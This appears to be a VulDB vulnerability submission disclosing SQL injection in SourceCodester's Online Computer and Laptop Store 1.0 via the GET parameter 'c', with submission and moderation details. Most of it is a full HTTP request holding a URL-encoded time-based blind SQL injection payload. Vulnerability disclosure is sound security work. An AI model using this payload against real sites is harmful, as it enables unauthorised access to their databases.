| Field | Value |
|---|---|
| Title | Online Computer and Laptop Store V1.0 /php-ocls/?c=*&p=products GET parameter 'c' SQL injection vulnerability |
| Description | In the Online Computer and Laptop Store system, I discovered a serious vulnerability where SQL injection vulnerabilities exist through GET requests, allowing direct reading of all database files. |

```http
GET /php-ocls/?c=%27%20AND%20(SELECT%202078%20FROM%20(SELECT(SLEEP(5)))pWJI)%20AND%20%27Phcl%27=%27Phcl&p=products HTTP/1.1
Host: 192.168.0.102
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:112.0esr) Gecko/20010101 Firefox/112.0esr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

| Field | Value |
|---|---|
| Source | https://docs.google.com/document/d/1GZt9MKB2K-nDrg0cnrnU6_z9wDd9xPE-YJbPV2Qgqg4/edit |
| User | T4y1oR_Xu (UID 45486) |
| Submission | 04/22/2023 08:45 |
| Moderation | 04/22/2023 17:45 (9 hours later) |
| Status | Accepted |
| VulDB entry | 227227 [SourceCodester Online Computer and Laptop Store 1.0 GET Parameter c/s sql injection] |
| Points | 20 |